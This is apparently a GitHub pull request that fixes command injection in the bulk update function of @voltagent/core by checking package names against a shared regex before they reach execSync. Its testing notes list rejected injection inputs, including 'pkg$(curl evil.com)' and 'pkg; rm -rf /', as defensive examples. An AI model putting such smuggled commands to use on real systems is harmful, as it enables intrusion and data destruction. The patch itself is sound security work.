### PR TITLE
fix(core): add package name validation to updateAllPackages

### DIFF
--- a/.changeset/fix-update-all-packages-injection.md
+++ b/.changeset/fix-update-all-packages-injection.md
@@ -1,0 +1,13 @@
+---
+"@voltagent/core": patch
+---
+
+fix(core): add package name validation to updateAllPackages to prevent command injection
+
+`updateAllPackages` concatenated package names from `package.json` directly into shell commands
+passed to `execSync()` without validation. The sibling function `updateSinglePackage` already
+validated names against a regex. Extracted the validation regex into a shared `VALID_PKG_NAME_RE`
+constant and added a `.filter()` step in `updateAllPackages` to skip packages with invalid names,
+with a warning log for skipped entries.
+
+Fixes #1205

--- a/packages/core/src/utils/update/index.ts
+++ b/packages/core/src/utils/update/index.ts
@@ -353,6 +353,17 @@ export const updateAllPackages = async (
       .filter((pkg) => pkg.type !== "latest")
       .filter((pkg) => VALID_PKG_NAME_RE.test(pkg.name))
       .map((pkg) => `${pkg.name}@latest`);
+
+    if (packagesToUpdate.length === 0) {
+      return {
+        success: true,
+        message:
+          skippedPackages.length > 0
+            ? `Skipped ${skippedPackages.length} invalid package name(s); no valid packages to update`
+            : "No valid packages to update",
+      };
+    }
+
     logger.info(`Updating ${packagesToUpdate.length} packages in ${rootDir}`);
 
     // 4. Run the update command based on package manager

--- a/packages/core/src/utils/update/index.ts
+++ b/packages/core/src/utils/update/index.ts
@@ -10,6 +10,12 @@ import {
   writeUpdateCache,
 } from "./cache";
 
+/**
+ * Valid npm package name pattern.
+ * Shared between updateAllPackages and updateSinglePackage to prevent command injection.
+ */
+const VALID_PKG_NAME_RE = /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*$/;
+
 type UpdateOptions = {
   filter?: string;
   useCache?: boolean;
@@ -332,11 +338,21 @@ export const updateAllPackages = async (
     const packageManager = detectPackageManager(rootDir);
 
     // 3. Prepare the package list for updating
+    const logger = new LoggerProxy({ component: "update-checker" });
+
+    const skippedPackages = updateCheckResult.updates.filter(
+      (pkg) => pkg.type !== "latest" && !VALID_PKG_NAME_RE.test(pkg.name),
+    );
+    if (skippedPackages.length > 0) {
+      logger.warn(
+        `Skipped ${skippedPackages.length} package(s) with invalid names: ${skippedPackages.map((p) => p.name).join(", ")}`,
+      );
+    }
+
     const packagesToUpdate = updateCheckResult.updates
       .filter((pkg) => pkg.type !== "latest")
+      .filter((pkg) => VALID_PKG_NAME_RE.test(pkg.name))
       .map((pkg) => `${pkg.name}@latest`);
-
-    const logger = new LoggerProxy({ component: "update-checker" });
     logger.info(`Updating ${packagesToUpdate.length} packages in ${rootDir}`);
 
     // 4. Run the update command based on package manager
@@ -410,9 +426,7 @@ export const updateSinglePackage = async (
     }
 
     // Command injection protection - only allow valid NPM package names
-    const isValidPackageName = /^(@[a-z0-9-~][a-z0-9-._~]*\/)?[a-z0-9-~][a-z0-9-._~]*$/.test(
-      packageName,
-    );
+    const isValidPackageName = VALID_PKG_NAME_RE.test(packageName);
     if (!isValidPackageName) {
       return {
         success: false,


### PR DESCRIPTION
## Summary

`updateAllPackages()` concatenates package names from `package.json` directly into shell commands passed to `execSync()` without validation. The sibling function `updateSinglePackage()` already validates names against a regex, but `updateAllPackages()` does not.

## Changes

- **Extract shared constant**: `VALID_PKG_NAME_RE` — the npm package name validation regex previously duplicated between functions
- **Add validation filter** in `updateAllPackages`: packages with invalid names are now filtered out before command construction
- **Add warning log** for skipped packages so the rejection is not silent
- **Deduplicate regex** in `updateSinglePackage` to use the shared constant

## Testing

Verified the regex correctly:
- Accepts: `lodash`, `@voltagent/core`, `my-pkg`
- Rejects: `pkg$(curl evil.com)`, `pkg; rm -rf /`, `pkg && echo pwned`

Closes #1205

<!-- This is an auto-generated description by cubic. -->
---
## Summary by cubic
Add npm package name validation to `updateAllPackages` to block command injection and avoid bare installs when only invalid names are found. Aligns behavior with `updateSinglePackage`, logs warnings on skipped names, and fixes #1205.

- **Bug Fixes**
  - Shared `VALID_PKG_NAME_RE` used in `updateAllPackages` and `updateSinglePackage`.
  - Skip invalid names and warn; return early if `packagesToUpdate` is empty.
  - Build update commands only from validated packages.

<sup>Written for commit 15c4cd8ceee5e6a47694504144bab31f8e18161d. Summary will update on new commits.</sup>

<!-- End of auto-generated description by cubic. -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

## Bug Fixes
* Patched a security issue in package update operations where invalid package names could be used before execution.
* Invalid or malformed package names are now filtered out before any update commands run; skipped entries produce warning messages.
* Package name validation is now consistent between single-package and bulk update flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->